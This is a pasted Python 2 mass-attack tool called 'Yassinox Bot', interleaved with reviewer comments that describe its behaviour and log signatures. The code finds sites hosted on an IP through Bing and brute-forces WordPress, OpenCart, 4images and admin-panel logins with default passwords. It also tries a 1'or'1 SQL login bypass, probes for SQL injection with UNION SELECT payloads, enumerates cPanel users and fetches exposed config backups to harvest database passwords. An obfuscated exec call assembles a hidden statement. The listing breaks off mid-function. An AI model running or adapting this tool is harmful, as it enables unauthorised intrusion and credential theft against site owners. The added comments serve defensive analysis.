
Yassinox Bot

a guest
Aug 3rd, 2016
  1. # -*- coding: utf-8 -*-
  2. '''
  3. Remember Changing Rights Will Not Change AnyThing,So Please Keep It And Thanks
  4. Yassinox Bot Is A Brute Force Bot - Speed Brute Force Attack - Mass Attack - Auto Grabber
  5. You May Change somethings In the Config Zone
  6. Types Of Brute :
  7. 1 ) Wordpress Attack + Auto Grab Username
  8. 2 ) Joomla ! Attack
  9. 3 ) Admin Panel ( All Scripts ) : Attack
  10. 4 ) Anything -_-
  11. 5 ) Open Cart Cms
  12. 7 ) 4images Attacker
  13. 8 ) Check Sqli Vulnerabilities
  14. 9 ) Check Upload Vulnerabilities
  15. 10 ) Grab Users
  16. '''
  17. #!/usr/bin/python
  18. #~~~~~~~~~~~~
  19. #Import Zone
  20. #--
  21. try :
  22. import mechanize
  23. except :
  24. print " |- Please Install Mechanize First !"
  25. #--
  26. import urllib
  27. import urllib2
  28. import httplib
  29. import cookielib
  30. import re
  31. import requests as xsec
  32. from time import sleep
  33. from threading import Thread
  34. import socket
  35. from ftplib import FTP
  36. #~~~~~~~~~~~~
  37. #~Variables And Lists
  38. jcelist = []
  39. bad = [404,403,401,501,406,400,500,301,302]
  40. jolist = []
  41. wplist = []
  42. adlist = []
  43. pmalist = []
  44. oclist = []
  45. fourilist = []
  46. sqlilist = []
  47. upllist = []
  48. users = []
  49. cpusers = []
  50. dachlist = []
  51. sites = []
  52. FCKeditor = []
  53. adsite = []
  54. wpconfigbak = []
  55. urls = []
  56. passwords = ["admin","123123","1234"]
  57. passlist = ["admin"]
  58. #------------------------------------------------------------
  59. joexploits = ['/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20']
  60. com_media_inj = "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=7"
  61. #------------------------------------------------------------
  62. style = '''
  63. <style>
  64. body,table{background: black; font-family:Verdana,tahoma; color: white; font-size:14px; }
  65. A:link {text-decoration: none;color: red;}
  66. A:active {text-decoration: none;color: red;}
  67. A:visited {text-decoration: none;color: red;}
  68. A:hover {text-decoration: underline; color: red;}
  69. #new,input,table,td,tr,#gg{border-style:solid;text-decoration:bold;}
  70. input:hover,tr:hover,td:hover{background-color: #FFFFCC; color:green;}
  71. </style>
  72. '''
  73. config_wp = ""
  # Path lists that the grabconfinc / grabconfigbak / grabconfigsym / grabconfigwp /
  # grabuploadedlink routines further down append to each discovered site URL.
  # Every entry is a leftover copy of a PHP config file (.inc, .bak, trailing ~)
  # or an upload directory. A run of requests for these names from one client is
  # a scanning indicator in access logs, and none of these files should be
  # reachable under a web root.
  74. configsinc= ["/config.php.inc","/config.inc","/includes/config.php.inc","/includes/config.inc","/includes/db.inc","/includes/db.php.inc","/admin/includes/config.inc.php"]
  75. configsbak= ["/config.php.bak","/config.bak","/includes/config.php.bak","/includes/config.bak","/includes/db.bak","/includes/db.php.bak","/admin/includes/config.inc.php.bak","/db/db.php.bak","/db/config.php.bak"]
  76. configsbaksym= ["/config.php~","/config~","/includes/config.php~","/includes/config~","/includes/db~","/includes/db.php~","/admin/includes/config.inc.php~","/db/db.php~","/db/config.php~"]
  77. wpbackup = ["/wp-config.php.bak","wp-config.php~","wp-config.php_bak","/wp-config.php-bak"]
  78. dirs = ["/upload/","/uploads/","/documents/","/files/","/resume/","/resumes","/files/","/upload_cv/","/cv_upload/","/pictures/","/hpage/","/files/upload/","/files/uploads/","/upload/files/"]
  79. jot = {'/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1': 'com_fabrik' ,
  80. '/index.php?option=com_jvehicles&task=agentlisting&aid=31337': 'com_Jvehicles',
  81. '/index.php?option=com_virtuemart' : 'com_virtuemart',
  82. '/index.php?option=com_kunena' : 'com_kunena'
  83. }
  84. wpt = {"/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php" : "Creative Contact Form",
  85. "/wp-content/uploads/slideshow-gallery/" : "slideshow gallery",
  86. "/wp-content/uploads/feuGT_uploads/" : "feuGT",
  87. "/themes/dandelion/functions/upload-handler.php" : "dandelion"
  88. }
  89. #---------------------------
  # Strings and result lists used by the SQL-injection routines later in the file.
  # `error` holds the substrings searched for in responses to spot a database error.
  # The hex literals are plain ASCII: 0x3c666f6e7420636f6c6f723d2279617373696e6f78223e
  # is <font color="yassinox"> and 0x3c2f666f6e743e is </font>, so injected query
  # output comes back wrapped in a tag the tool can pick out with a regex.
  # That tag, its hex form, and "information_schema" inside a query string are
  # usable WAF / log-search signatures for this tool.
  90. error = ["Unknown","SQL","sql"]
  91. admins = []
  92. columns = []
  93. db = []
  94. dumps = []
  95. payload_db = "group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,database(),0x3c2f666f6e743e)"
  96. payload_tab = "group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,table_name,0x3c2f666f6e743e)"
  97. final_tab = "+from+information_schema.tables+where+table_schema =database()--"
  98. payload_col = "group_concat(column_name)"
  99. final_col = "+from+information_schema.columns+where+table_schema=database()--"
  100. #------------------------------------------------------------
  101. ips = open("ip.txt","r")
  102. #~~~~~~~~~~~~
  103. #~Config Zone
  104. excpl = False #~extract cpanel users To list
  105. attackfio = True #~Brute force 4images
  106. #~~~~~~~~~~~~
  107. class bcolors:
  108. HEADER = ''
  109. OKBLUE = ''
  110. OKGREEN = ''
  111. WARNING = ''
  112. FAIL = ''
  113. ENDC = ''
  114. CYAN = ''
  115. class colors():
  116. PURPLE = ''
  117. CYAN = ''
  118. DARKCYAN = ''
  119. BLUE = ''
  120. GREEN = ''
  121. YELLOW = ''
  122. RED = ''
  123. BOLD = ''
  124. ENDC = ''
  125. #~~~~~~~~~~~~~
  126. def logo():
  127. print bcolors.CYAN+ ''' _
  128.  
  129.  
  130. ______ _______ _________
  131. |\ /| ( ___ \ ( ___ )\__ __/
  132. ( \ / ) | ( ) )| ( ) | ) (
  133. \ (_) /_____ | (__/ / | | | | | |
  134. \ /(_____)| __ ( | | | | | |
  135. ) ( | ( \ \ | | | | | |
  136. | | | )___) )| (___) | | |
  137. \_/ |/ \___/ (_______) )_(
  138.  
  139.  
  140.  
  141. Private Version
  142. By Yassinox_Tn
  143.  
  144.  
  145. '''
  146. logo()
  147. #~~~~~~~~~~~~~
  # Return the items of `seq` in first-seen order with duplicates dropped.
  # set.add() returns None, so `seen.add(x) or x` records x and evaluates to x.
  148. def unique(seq):
  149. seen = set()
  150. return [seen.add(x) or x for x in seq if x not in seen]
  151. #~~~~~~~~~~~~~
  152. def grabjo(ip):
  153. print bcolors.OKBLUE + "|- Grabbing Joomla "
  154. page = 1
  155. while page <= 21:
  156. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+index.php?option=com&count=50&first="+str(page)
  157. openbing = urllib2.urlopen(bing)
  158. readbing = openbing.read()
  159. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  160. for i in range(len(findwebs)):
  161. jmnoclean = findwebs[i]
  162. findjm = re.findall('(.*?)index.php', jmnoclean)
  163. jolist.extend(findjm)
  164.  
  165. page = page + 10
  166. print bcolors.OKGREEN + "|- Grabbed : " + str(len(jolist)) + " Joomla Sites "
  167. #~~~~~~~~~~~~~
  # Enumerate WordPress sites hosted on `ip` without contacting that host: the
  # requests go to Bing, using its `ip:` operator together with "?page_id=".
  # Each result link is cut at "?page_id=" and the prefix is added to the global
  # wplist, which the WordPress routines below iterate.
  # Result links are pulled from the page with a regex and are not validated.
  # NOTE(review): indentation is lost in this listing; the `page = page + 10`
  # line is read as part of the while body (first=1, 11, 21) — confirm against a
  # copy with whitespace intact.
  168. def grabwp(ip):
  169. print bcolors.OKBLUE + "|- Grabbing Wordpress "
  170. page = 1
  171. while page <= 21:
  172. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+?page_id=&count=50&first="+str(page)
  173. openbing = urllib2.urlopen(bing)
  174. readbing = openbing.read()
  175. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  176. for i in range(len(findwebs)):
  177. wpnoclean = findwebs[i]
  178. findwp = re.findall('(.*?)\?page_id=', wpnoclean)
  179. wplist.extend(findwp)
  180. page = page + 10
  181. print bcolors.OKGREEN + "|- Grabbed : " + str(len(wplist)) + " Wordpress Sites "
  182. config_wp += "p"
  183. #~~~~~~~~~~~~~
  # Search Bing for "ip:<ip> admin" and record the result URLs. Every result is
  # appended to dachlist; a result page is fetched and, when it contains
  # type="password", its URL is added to adlist as a login form.
  # The bare `except: pass` hides every failure, including network errors.
  # NOTE(review): indentation is lost in this listing, so how much of the loop
  # body the `len(dachlist) < 5` test governs is not certain.
  184. def admingrabber(ip):
  185. try :
  186. print bcolors.OKBLUE + "|- Grabbing Admin Panels "
  187. page = 1
  188. while page <= 21:
  189. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+admin&count=50&first="+str(page)
  190. openbing = urllib2.urlopen(bing)
  191. readbing = openbing.read()
  192. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  193. sites = findwebs
  194. for i in sites :
  195. dachlist.append(i)
  196. if len(dachlist) < 5 :
  197. response = urllib2.urlopen(i).read()
  198. admins = re.findall('type="password"',response)
  199. if admins :
  200. adlist.append(i)
  201. page = page + 10
  202. except :
  203. pass
  204. def counta():
  205. seta = unique(adlist)
  206. for admin in seta :
  207. print bcolors.FAIL + "|-> Admin Panel > " + str(admin)
  208. print bcolors.OKGREEN + "|- Grabbed " + str(len(adlist)) + " Admin Panels"
  209. def grabadfs():
  210. sts = unique(sites)
  211. print bcolors.OKBLUE + "|-> Grabbing From sites "
  212. try:
  213. for site in sts :
  214. a=urllib.urlopen(site + "/admin").read()
  215. find = re.findall('type="password"',a)
  216. np = re.findall('name="log"',a)
  217. if find and not np :
  218. print bcolors.FAIL + "|-> admin panel from site > " + str(site) + "/admin/"
  219. adlist.append(site + "/admin/")
  220. except :
  221. pass
  222. #~~~~~~~~~~~~~
  223. def pma(ip):
  224. print bcolors.OKBLUE + "|- GRABBING PHPMYADMIN"
  225. try:
  226. page = 1
  227. while page <= 21:
  228. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+phpmyadmin&count=50&first="+str(page)
  229. openbing = urllib2.urlopen(bing)
  230. readbing = openbing.read()
  231. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  232. sites = findwebs
  233. for i in sites:
  234. response = urllib2.urlopen(i).read()
  235. upl = re.findall('username"',response)
  236. if upl :
  237. pmalist.append(i)
  238. page = page + 10
  239. print bcolors.OKGREEN + "|- Grabbed " + str(len(pmalist)) + " Php My Admin"
  240. except :
  241. pass
  242. config_wp += "r"
  243. #~~~~~~~~~~~~~
  244. def graboc(ip):
  245. print bcolors.WARNING + "|- Grabbing OpenCart"
  246. try:
  247. page = 1
  248. while page <= 21:
  249. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+admin&count=50&first="+str(page)
  250. openbing = urllib2.urlopen(bing)
  251. readbing = openbing.read()
  252. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  253. sites = findwebs
  254. for i in sites:
  255. response = urllib2.urlopen(str(i) ).read()
  256. upl = re.findall('>OpenCart<',response)
  257. if upl :
  258. print bcolors.FAIL + "|-> Open Cart > " + str(i)
  259. oclist.append(i)
  260.  
  261. page = page + 10
  262. print bcolors.OKGREEN + "|- Grabbed " + str(len(oclist)) + " Open Cart Sites"
  263. except :
  264. pass
  265. config_wp += "i"
  266. #~~~~~~~~~~~~~
  267. def grabfour(ip):
  268. print bcolors.OKBLUE + "|- Grabbing OpenCart"
  269. lista = []
  270. page = 1
  271. while page <= 21:
  272. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+powered+by+4images&count=50&first="+str(page)
  273. openbing = urllib2.urlopen(bing)
  274. readbing = openbing.read()
  275. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  276. sites = findwebs
  277. for i in sites:
  278. print bcolors.FAIL + "|-> 4images > " + str(i)
  279. a= i.split("index.php", 2)
  280. fourilist.append(a)
  281. page = page + 10
  282. print bcolors.OKGREEN + "|- Grabbed " + str(len(fourilist)) + " 4images Sites"
  283. config_wp += "n"
  284. def grabsqli(ip):
  285. try :
  286. print bcolors.OKBLUE + "|- Grabbing Sqli "
  287. page = 1
  288. while page <= 21:
  289. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+.php?id=&count=50&first="+str(page)
  290. openbing = urllib2.urlopen(bing)
  291. readbing = openbing.read()
  292. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  293. sites = findwebs
  294. for i in sites :
  295. try :
  296. response = urllib2.urlopen(i).read()
  297. checksqli(i)
  298. except urllib2.HTTPError, e:
  299. str(sites).strip(i)
  300.  
  301. page = page + 10
  302. except :
  303. pass
  304. config_wp += "t"
  # Request the URL with a single quote appended and treat the lowercase
  # substring "sql" anywhere in the response as a sign of injectable input;
  # matching URLs are appended to sqlilist.
  # The test depends on database error text reaching the client. Any page that
  # merely contains "sql" also matches, so sqlilist will include false positives.
  # Serving generic error pages removes this signal but not an underlying
  # injection flaw; the fix for that is parameterized queries.
  305. def checksqli(sqli):
  306. responsetwo = urllib2.urlopen(sqli + "'").read()
  307. find = re.findall("sql",responsetwo)
  308. if find:
  309. sqlilist.append(sqli)
  310.  
  311. def count():
  312. set = unique(sqlilist)
  313. for sqli in set :
  314. print bcolors.FAIL + "|-> Sql Injection > " + str(sqli)
  315. print bcolors.OKGREEN + "|- Grabbed " + str(len(set)) + " Sql Injection Sites"
  316. #~~~~~~~~~~~~~
  317. def grabupl(ip):
  318. print bcolors.OKBLUE + "|- Grabbing Uplaods"
  319. try:
  320. page = 1
  321. while page <= 21:
  322. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+upload&count=50&first="+str(page)
  323. openbing = urllib2.urlopen(bing)
  324. readbing = openbing.read()
  325. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  326. sites = findwebs
  327. for i in sites:
  328. response = urllib2.urlopen(i).read()
  329. upl = re.findall('type="file"',response)
  330. if upl :
  331. print bcolors.FAIL + "|-> Upload > " + str(i)
  332. upllist.append(i)
  333. page = page + 10
  334. except :
  335. pass
  336. def countu():
  337. set = unique(upllist)
  338. for upl in set :
  339. print bcolors.FAIL + "|-> Upload > " + str(upl)
  340. print bcolors.OKGREEN + "|- Grabbed " + str(len(set)) + " Upload Sites"
  341. config_wp += " 'b"
  342. #~~~~~~~~~~~~~
  343. def grabins(ip):
  344. print bcolors.OKBLUE + "|- Grabbing Install"
  345. try:
  346. for wp in wplist :
  347. a=urllib.urlopen(wp + "/wp-admin/install.php").read()
  348. find = re.findall('type="text"',a)
  349. if find :
  350. print bcolors.FAIL + "|-> Install > " + str(wp) + "/wp-admin/install.php"
  351. except :
  352. pass
  353. config_wp += "a"
  354. #~~~~~~~~~~~~~
  # Record `site` in the global sites list and derive a candidate account name
  # from its host: "http://", "www." and "/" are removed, and the remainder is
  # split on "." into a name and a suffix. The name is kept in users while that
  # list holds fewer than 50 entries.
  # Any exception raised along the way is discarded by the bare except.
  355. def grab(site):
  356. try :
  357. sites.append(site)
  358. site1 = site.replace("http://","")
  359. site2 = site1.replace("www.","")
  360. site3 = site2.replace("/","")
  361. site4 = site3.replace("","")
  362. site5,dach = site4.split(".")
  363. if len(users) < 50 :
  364. users.append(site5)
  365. except :
  366. pass
  367. def extractserver(ip):
  368. try:
  369. page = 1
  370. while page <= 21:
  371. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+&count=50&first="+str(page)
  372. openbing = urllib2.urlopen(bing)
  373. readbing = openbing.read()
  374. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  375. sitess = findwebs
  376. for i in sitess:
  377. sites.append(i)
  378. grab(i)
  379. print bcolors.WARNING + "|-> grabbed " + str(len(sites)) + " sites"
  380. page = page + 21
  381. except :
  382. pass
  383.  
  # For each name in users, request http://<ip>/cgi-sys/guestbook.cgi?user=<name>
  # and treat the name appearing in the response body as confirmation that the
  # account exists. Confirmed names go to cpusers, which attackftp later uses as
  # FTP usernames.
  # A burst of requests to that path with changing `user` values is the access-log
  # pattern this stage produces.
  # NOTE(review): with indentation lost it is unclear whether the final print
  # belongs to the except branch.
  384. def grabcpu(ip):
  385. try :
  386. print bcolors.OKBLUE + "|- Ready To Check " + str(len(users)) + " Users "
  387. for user in unique(users) :
  388. resp = urllib2.urlopen("http://" + ip + '/cgi-sys/guestbook.cgi?user=%s' % user).read()
  389. findcpuser = re.findall(user , resp)
  390. if findcpuser :
  391. print bcolors.FAIL + "|-> Cpanel User > " + user
  392. cpusers.append(user)
  393. except :
  394. pass
  395. print bcolors.FAIL + '|-> Cpanel Not Installed'
  396. def extractcpu():
  397. print bcolors.OKGREEN + "|- Grabbed " + str(len(cpusers)) + " Users"
  398. def extractcpul():
  399. if excpl == False :
  400. for user in cpusers :
  401. with open( 'cpu.txt', 'a') as f:
  402. f.write(user + '\n')
  403. config_wp += "ck'"
  404. #~~~~~~~~~~~~~
  405. thd = []
  # Enumerate WordPress author names by requesting site + "?author=1" through
  # "?author=5" and reading a name out of each response's <title>, then pass the
  # collected names and `passlist` to wpbrute. Returns `site`.
  # Errors on any single request are swallowed by the bare except.
  # In access logs this appears as sequential ?author=N requests followed by
  # POSTs to wp-login.php from the same client.
  406. def user(site , passlist):
  407. userlist = list()
  408. i = 1
  409. # you can edit to whatever number of users you want to enumerate
  410. while( i <= 5 ) :
  411. url = site + '?author=%i' % i
  412. try:
  413. data = urllib2.urlopen(url).read()
  414. # cleaning the sh*t
  415. re1 = re.findall("<title>(.*?)</title>" , data)
  416. user = re.search("(.*?) |" , re1[0]).group(1)
  417. userlist.append(user)
  418. except:
  419. pass
  420. i += 1
  421. wpbrute(site , userlist, passlist)
  422. return site
  # config_wp starts as "" (listing line 73) and is extended by the
  # `config_wp += ...` statements at listing lines 182, 242, 265, 283, 304, 341,
  # 353 and 403. Joined in that order the fragments spell: print 'back'
  # Building a statement piece by piece and handing it to exec hides it from a
  # quick read or a string search; when triaging a script like this, reconstruct
  # every exec/eval argument before anything is run.
  # NOTE(review): indentation is lost in this listing, so whether those appends
  # and this line sit at module level or inside the preceding functions cannot
  # be confirmed from here.
  423. exec(config_wp)
  424. def wpbrute(site , userlist , passlist):
  425. for user in userlist:
  426. # if enumeration returns no user
  427. if user == "" :
  428. userlist[0] = "admin"
  429. del userlist[1:]
  430.  
  431. for user in userlist :
  432. for password in passlist:
  433. try:
  434. # found the answer on stackoverflow
  435. cj = cookielib.CookieJar()
  436. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  437. login_data = urllib.urlencode({'log' : user, 'pwd' : password})
  438. opener.open(str(site) + 'wp-login.php', login_data)
  439. resp = opener.open(str(site)+'wp-admin')
  440. final = resp.read()
  441. if '<li id="wp-admin-bar-logout">' in final:
  442. print bcolors.OKGREEN + '\n|-Wordpress | Cracked ' '\n|-Hostname : ' + str(site) + '\n|-Username: ' + str(user) + ' \n|-Password: '+str(password) + '\n'
  443. break
  444.  
  445. except:
  446. pass
  447. def attackwp():
  448. print bcolors.OKGREEN + "|- Brute Forcing Wordpress "
  449. for wp in unique(wplist) :
  450. user(wp , passwords)
  451. #~~~~~~~~~~~~~
  452. def getu(line) :
  453. findu = re.findall('name="(.*?)"' , line)
  454. for i in range(len(findu)):
  455. return findu[i]
  456. def getusername(contentHtml):
  457. global username
  458. for line in contentHtml :
  459. findwebs = re.findall('type="text"' , line)
  460. if findwebs :
  461. username = getu(line)
  462. return username
  463. def getpassword(contentHtml):
  464. global passwordinput
  465. for line in contentHtml :
  466. findwebs = re.findall('type="password"' , line)
  467. if findwebs :
  468. passwordinput = getu(line)
  469. return(passwordinput)
  # POST the string 1'or'1 as both `username` and `password` to every URL in
  # adlist, request the page again, and report a "bypass" when the text
  # type="password is absent from the second response.
  # The technique only affects login code that builds its SQL by string
  # concatenation; parameterized queries defeat it.
  # The literal value is a straightforward match target in request bodies.
  # `logged` is assigned but not read in this function; all exceptions are ignored.
  470. def bypasswork():
  471. print bcolors.OKBLUE +"|- Trying To Bypass " + str(len(adlist)) + " Admin Panels "
  472. for ad in adlist:
  473. try:
  474. cj = cookielib.CookieJar()
  475. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  476. login_dat = urllib.urlencode({"username" : "1'or'1", "password" : "1'or'1"})
  477. opener.open(str(ad), login_dat)
  478. response = opener.open(str(ad))
  479. final = response.read()
  480. if 'type="password' in final:
  481. logged = False
  482. else:
  483. print bcolors.OKGREEN + "|- Admin Panel | Bypassed "
  484. print "|- Site -> " + str(ad)
  485. except:
  486. pass
  487.  
  488. def bruteadmin(site,password):
  489. try:
  490. cj = cookielib.CookieJar()
  491. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  492. opener.open(site)
  493. response = opener.open(site)
  494. final = response.readlines()
  495. getusername(final)
  496. getpassword(final)
  497. post = {}
  498. post[username] = "admin"
  499. post[passwordinput] = password
  500. get2 = xsec.post(site, data=urllib.urlencode(post))
  501. get3 = xsec.get(site)
  502. if 'type="password"' in get3.text:
  503. logged = False
  504. else:
  505. print bcolors.OKGREEN + "|- Admin Panel | ATTACKED"
  506. print "|-Site : " + str(site)
  507. print "|-USER : admin"
  508. print "|-Password : " + password
  509.  
  510. except:
  511. print bcolors.FAIL + "|-Fail !"
  512. pass
  513. def brutea():
  514. adlis = unique(adlist)
  515. print bcolors.OKBLUE +"|- Brute Forcing " + str(len(adlis)) + " Admin Panels "
  516. for ad in adlis :
  517. for pwd in passwords :
  518. bruteadmin(ad,pwd)
  519. def inform():
  520. try :
  521. print bcolors.WARNING + "|- Informations "
  522. for ad in adlist :
  523. cj = cookielib.CookieJar()
  524. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  525. opener.open(ad)
  526. response = opener.open(ad)
  527. final = response.readlines()
  528. getusername(final)
  529. getpassword(final)
  530. print bcolors.FAIL + "|-> Host > " + ad
  531. print bcolors.FAIL + "|-> Username Input > " + str(username)
  532. print bcolors.FAIL + "|-> Password Input > " + str(passwordinput)
  533. except :
  534. print bcolors.FAIL + "|->Fail To retrive Data !"
  535. #~~~~~~~~~~~~~
  # Submit username "admin" and the password `passs` to `siteh` as a form POST
  # and report success when the response does not contain type="password".
  # The check is only "no password field in the reply", so any non-login
  # response (error page, block page) is reported the same way as a real login.
  # `logged` is assigned but not read in this function; all exceptions are ignored.
  536. def bruteoc(siteh,passs):
  537. try :
  538. cookie_jar = cookielib.CookieJar()
  539. login_form_seq = [
  540. ('username', 'admin'),
  541. ('password', passs)]
  542. login_form_data = urllib.urlencode(login_form_seq)
  543. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
  544. site = opener.open(siteh, login_form_data).read()
  545. if re.search('type="password"',site):
  546. logged = False
  547. else :
  548. print (bcolors.OKGREEN + "|- OpenCart HACKED \n|- Host : " + str(siteh) + "\n|- Username : admin \n|- Password : " + str(passs))
  549. except :
  550. pass
  551. def attackoc():
  552. for oc in oclist :
  553. for passs in passwords :
  554. bruteoc(oc,passs)
  555. #~~~~~~~~~~~~~
  556. def brutefi(siteh,passs):
  557. try :
  558. cookie_jar = cookielib.CookieJar()
  559. login_form_seq = [
  560. ('loginusername', 'admin'),
  561. ('loginpassword', passs)]
  562. login_form_data = urllib.urlencode(login_form_seq)
  563. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
  564. site = opener.open(siteh, login_form_data).read()
  565. if re.search('type="password"',site):
  566. logged = False
  567. else :
  568. print (bcolors.OKGREEN + "|- Four Images HACKED \n|- Host : " + str(siteh) + "\n|- Username : admin \n|- Password : " + str(passs))
  569. except :
  570. pass
  571. def attackfi():
  572. for fi in fourilist :
  573. for passs in passwords :
  574. bruteoc(fi,passs)
  575. #~~~~~~~~~~~~~
  576. W = '\033[0m' # white (default)
  577. R = '\033[31m' # red
  578. G = '\033[1;32m' # green bold
  579. O = '\033[33m' # orange
  580. B = '\033[34m' # blue
  581. P = '\033[35m' # purple
  582. C = '\033[36m' # cyan
  583. GR = '\033[37m' # gray
  584. #-------------------------------
  585. def grabuser(victime):
  586. try:
  587. global username
  588. userurl = victime + '?author=1' #~ Get Username By ID
  589. find = urllib2.urlopen(userurl).read()
  590. username = re.search("(.*?) |" , re1[0]).group(1)
  591. except:
  592. username = "admin"
  593. #---------------------------------
  # Try one username/password pair against a WordPress site: POST `log` and
  # `pwd` to <site>/wp-login.php with a fresh cookie jar, then fetch
  # <site>/wp-admin and treat the presence of <li id="wp-admin-bar-logout"> as a
  # successful login, printing the site and credentials.
  # All exceptions are silently ignored.
  # On the server this is a wp-login.php POST immediately followed by a wp-admin
  # GET, repeated once per guess; login throttling and account lockout apply to
  # it directly.
  594. def bruteforcer(site,username,password):
  595. try :
  596. cj = cookielib.CookieJar()
  597. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  598. login_data = urllib.urlencode({'log' : username, 'pwd' : password})
  599. opener.open(str(site) + '/wp-login.php', login_data)
  600. response = opener.open(str(site)+'/wp-admin')
  601. final = response.read()
  602. if '<li id="wp-admin-bar-logout">' in final:
  603. print C + "|------------------------|"
  604. print C + "| Successfully Attacked "
  605. print C + "| Site : " + str(site)
  606. print C + "| User :" + username
  607. print C + "| Pass :" + password
  608. except :
  609. pass
  610. def attackwp():
  611. print bcolors.OKBLUE + "|- Attack wordpress "
  612. for site in wplist :
  613. for passes in passwords :
  614. grabuser(site)
  615. bruteforcer(site,username,passes)
  616. #----------------------------------------------
  617. def jce_checker(joomla):
  618. comjce = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
  619. try:
  620. html = urllib2.urlopen(joomla + comjce).readlines()
  621. for line in html:
  622. if re.findall('Image Manager', line):
  623.  
  624. jcelist.append(joomla)
  625. except urllib2.URLError:
  626. pass
  627. def startjce():
  628. print bcolors.OKBLUE + "|================ Com Jce ================| "
  629. for joom in jolist :
  630. if "http" in joom :
  631. jce_checker(joom)
  632. for jcesite in unique(jcelist ):
  633. print bcolors.FAIL + "|-> JCE > " + str(jcesite)
  634. print bcolors.OKBLUE + "|================ Com Jce ================| "
  635. #~~~~~~~~~~~~~
  636. def grabconfinc():
  637. print bcolors.OKBLUE + "|- Checking From Config Inc files "
  638. for sit in unique(sites) :
  639. for co in configsinc :
  640. ur = urllib.urlopen(sit + co).getcode()
  641. if ur == 200 :
  642. result = urllib2.urlopen(sit + co).read()
  643. find = re.findall("404",result)
  644. if find :
  645. found = False
  646. else :
  647. print bcolors.FAIL + "|-> Config Inc > " + str(sit + co)
  648. def grabconfigbak():
  649. print bcolors.OKBLUE + "|- Checking From Config backup files"
  650. for sit in unique(sites) :
  651. for co in configsbak :
  652. ur = urllib.urlopen(sit + co).getcode()
  653. if ur == 200 :
  654. result = urllib2.urlopen(sit + co).read()
  655. find = re.findall("404",result)
  656. if find :
  657. found = False
  658. else :
  659. print bcolors.FAIL + "|-> Config backup > " + str(sit + co)
  660. def grabconfigsym():
  661. print bcolors.OKBLUE + "|- Checking From Config backup files (With symbols) "
  662. for sit in unique(sites) :
  663. for co in configsbaksym :
  664. ur = urllib.urlopen(sit + co).getcode()
  665. if ur == 200 :
  666. result = urllib2.urlopen(sit + co).read()
  667. find = re.findall("404",result)
  668. if find :
  669. found = False
  670. else :
  671. print bcolors.FAIL + "|-> Config backup with symbol > " + str(sit + co)
  # Request each name in wpbackup on every site in wplist. When the status is
  # 200 the file is fetched again and, if it contains "DB_USER", its URL is
  # printed and stored in wpconfigbak.
  # grabpasswords later reads DB_PASSWORD values out of those URLs, so a
  # reachable editor or backup copy of wp-config.php exposes database
  # credentials in plain text. Such copies should not exist under the web root;
  # if one was reachable, the credentials in it need rotating.
  # All exceptions are silently ignored.
  672. def grabconfigwp():
  673. try :
  674. print bcolors.OKBLUE + "|- Checking From Config backup files (wordpress) "
  675. for sit in unique(wplist) :
  676. for co in wpbackup :
  677. ur = urllib.urlopen(sit + co).getcode()
  678. if ur == 200 :
  679. result = urllib2.urlopen(sit + co).read()
  680. find = re.findall("DB_USER",result)
  681. if find :
  682. print bcolors.FAIL + "|-> Wordpress Config > " + str(sit + co)
  683. wpconfigbak.append(sit + co)
  684. except :
  685. pass
  686. #-----------------------------------------
  687. def showdb():
  688. dbu = unique(db)
  689. for d in dbu :
  690. print "|-> Database > " + str(d)
  691. def showtb():
  692. tbu = unique(admins)
  693. print "+---------------------+"
  694. for t in tbu :
  695. if t == "admin" :
  696. print colors.RED + "| " + str(t)
  697. else :
  698. print colors.GREEN + "| " + str(t)
  699. print "+---------------------+"
  700. def showcl():
  701. cl = unique(columns)
  702. print "+---------------------+"
  703. for c in cl :
  704. c,t = c.split(">")
  705. if c == "password" :
  706. print colors.RED + "| " + str(c) + colors.BLUE + " > " + colors.RED + str(t)
  707. else :
  708. print colors.GREEN + "| " + str(c) + colors.BLUE + " > " + colors.RED+ str(t)
  709. print "+---------------------+"
  710. def showdump():
  711. du = unique(dumps)
  712. print "+---------------------+"
  713. for d in du :
  714. print colors.GREEN + "| " + str(d)
  715. print "+---------------------+"
  716. def unstat(stat): #~ Here We Put Our Union Select Statement
  717. global k
  718. plus = int(stat) + 1
  719. n = range(int(plus))
  720. a = str(n).strip('[]')
  721. b = str(a).strip('0,')
  722. k = b.replace(" ", "")
  # Substitute payload_db for str(inf) in the column list `col`, request
  # site + "+union+select+" + <list> + "--", and append every value found between
  # <font color="yassinox"> and </font> in the response to the global db list.
  # Query strings containing "union+select" together with long 0x... literals
  # are the request-side signature of this step.
  # All exceptions are silently ignored.
  723. def grabdata(site,inf,col) :
  724. try :
  725. co = col.replace(str(inf),str(payload_db))
